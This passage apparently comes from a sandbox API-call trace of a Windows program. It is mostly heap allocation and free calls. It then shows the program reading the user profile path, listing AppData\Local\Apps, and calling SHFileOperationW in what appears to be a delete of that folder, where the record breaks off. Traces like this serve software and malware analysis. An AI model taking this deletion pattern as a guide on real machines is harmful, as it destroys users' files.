(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0208.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0208.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0208.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0208.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0208.417] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0208.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0208.417] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0208.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0208.417] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0208.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0208.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x2417000 [0208.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Apps", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", lpFilePart=0x8bedfc*="Apps") returned 0x30 [0208.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0208.419] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps")) returned 0x2010 [0208.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfcf, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5760 [0208.419] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfcf, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0208.419] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfcf, dwReserved1=0x4, cFileName="2.0", cAlternateFileName="")) returned 1 [0208.419] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfcf, dwReserved1=0x4, cFileName="2.0", cAlternateFileName="")) returned 0 [0208.419] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0208.420] GetLastError () returned 0x12 [0208.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0208.420] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0208.420] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0208.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0208.421] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x2417000 [0208.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Apps", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", lpFilePart=0x8bf658*="Apps") returned 0x30 [0208.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0208.423] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps")) returned 0x2010 [0208.423] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 